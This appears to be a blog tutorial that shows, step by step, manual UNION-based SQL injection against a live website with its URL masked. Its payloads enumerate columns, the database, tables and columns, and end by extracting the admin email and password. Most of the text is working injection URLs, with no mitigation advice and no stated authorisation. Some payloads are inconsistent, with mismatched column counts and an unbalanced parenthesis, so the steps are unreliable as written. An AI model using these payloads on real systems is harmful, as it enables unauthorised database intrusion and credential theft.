SQL_Injection

Manual Exploitation for SQL Injection

SQL Injection is one of the most critical vulnerabilities in a web application. As per Wikipedia or OWASP, SQL Injection is defined as “A code injection technique in which an attacker/malicious user/Hacker tries to alter a back-end SQL query by manipulating the user input.” It is also very easy to exploit as hundreds of SQL injection exploiting tools are available, even for a beginner, through a simple Google search.

In this article we will manually exploit a SQL Injection vulnerability and retrieve data from them. We have assumed that you have basic knowledge about the SQL Injection and related tools. The steps are describe below:

Step: 1

We have hidden the actual URL of the website as we are taking a live site example. Let’s look at the following URL.

AFN

In this URL currency_id is vulnerable for SQL Injection. We can verify this by putting a single quote after the value of country_id. In our case the value of country is 1 so the URL will look like.
http://————————ajax.php?action=currency&currency_id=1’

SQL error

Just by putting the single quote, we can see some kind of SQL error on the browser. It confirms that it is vulnerable for SQL Injection.

Step: 2

Next thing we find out is the vulnerable column. We can find it by using the UNION statement in the URL. Union is MySQL function that is basically used to join the output of multiple queries. So the URL will look like as following.
URL:
http://————————ajax.php?action=currency&currency_id=1 union all select 1
When we hit the URL in the browser, we get the following error.

number of columns

It means the query which is executing behind this URL has different number of columns. So our target as we mentioned above, is to find out the right number of columns in the URL. This can be done by increasing the no of parameters with Union statement and each parameter is separated by comma which is as following.

http://————————ajax.php?action=currency&currency_id=1 union all select 1,2

get this error

After executing the same in the browser we get this error. It means we still need to increase the value. We will have to increase the parameters in the URL until we get the response without the SQL error.

URL Reponses
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3 Getting the Same error on the Browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4 Getting the Same error on the Browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4 Getting the Same error on the Browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,5 Getting the Same error on the Browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,5,6 Getting the Same error on the Browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,6,7 Getting the Same error on the Browser
http://————————ajax.php?action=currency&currency_id=1 union all select 1,2,3,4,6,7,8 Different Message

 

Finally we get a different message on the browser after putting 8 numbers in the request. It means the query which is executing behind the form have 8 number of columns.

8 number of columns

Well, the output showing on the browser is also very important. It is not ’45’. It is basically the 4th and 5th position in the SQL query, in which we can manipulate the MySQL query. As of now it is printing 4th and 5th position, which was given in the URL. If we type anything instead of 4 and 5 that will be directly executed on the database server and rerun the result on the browser.

Step: 3

Now we will find out the Database Name and Version of the database. This can be done through simple MySQL statements by putting the statement on 4th and 5th position. That is described as below:
http://——————–/admin/ajax.php?action=currency&currency_id=1 union select 1,2,3,database(),version(),6,7,8

function

Database (): It is the MySQL function that returns the name of the current database.
Version (): It is the MySQL function that gives the version of the database.

We use both functions in the URL and see the output of both functions in the screen shot given above. The first value is the database name and the second value is the version of the database.

Step: 4

As of now we have successfully extracted database name and database version by the injection query. The next thing we have to find out is table names from the database. This is very tricky as we know if we logged in through the terminal “show tables” – it is the command which gives all the table name as the output. But this command doesn’t work here.

So we have to use some different technique for extracting the table name. As we know information_sechma is the database within each MySQL instance that store information about all the databases that the MySQL server maintains. We have already extracted the database name in the previous step. So we can extract the table information from that. The query for the same will look as follows. One more thing to remember is that everything will be executed by the MySQL queries only in the 4th and 5th possible as we mentioned in the above step.

http://——–/admin/ajax.php?action=currency&currency_id=999999.9 union all select 1,2,3, group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7

query was successfully

As can be seen in the above screen shot, our query was successfully executed on the server and all the table names have been displaying on the browser as the output of the query. Let’s analyse the query.

Information_schema.table is the table which stores all the information about the tables. So we select all the table information from this table where the database name is equal to database.
In the above query database () function give the current database name. group_concat (table_name) will provide all the table name from information_schema table.

Step: 5

As of now, we have successfully collected the database name and all the table names by injecting the query. The next thing we have to find out is column name in a particular table. It seems admin table should have the admin details of the application. So let’s collect the column name from this table. This can be done through the following query.

http://———admin/ajax.php?action=currency&currency_id=999999.9 union all select 1,2,3,(select (group_concat(column_name)) from information_schema.columns where table_schema=database() and table_name=”admin”),4,2,3,4—

adminid

Since information_schema have all the information about the database and tables so, this time we concat the column name from the information_scheme.column where database name is equal to the name of the current database, that the database () function will give and table name is equal to admin. It is the table name which we extract from the previous step.

Step: 6

The final and most important thing we have to extract from the database is the “DATA”. We already know the database name, table name and column name. So extracting the data from the table is very simple. Let’s do it.
http://——————/admin/ajax.php?action=currency&currency_id=999999.9+union+all+select+1,2,3,

(select+concat(admin.AdminEmail)+from+——-.admin+Order+by+AdminID+limit+0,1) ,1,2,3,4–
admin@

As we can see the Admin Email Address in the screen shot as the output of the injected query. Let’s execute another query which will give the password of the admin.

http://——–/admin/ajax.php?action=currency&currency_id=999999.9+union+all+select+1,2,3,(select+concat(admin.Password)+from test.admin+Order+by+AdminID+limit+0,1) ,1,2,3,4–
adminpassword

Finally, we have successfully extracted the admin email-Id and the password of the admin from the database.

About the Author:

Nikhil Kumar, a Certified Ethical Hacker, works as a Information Security Consultant. He has experience in web application pen-testing, social engineering, password cracking and android pen-testing. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.



Let us know what you think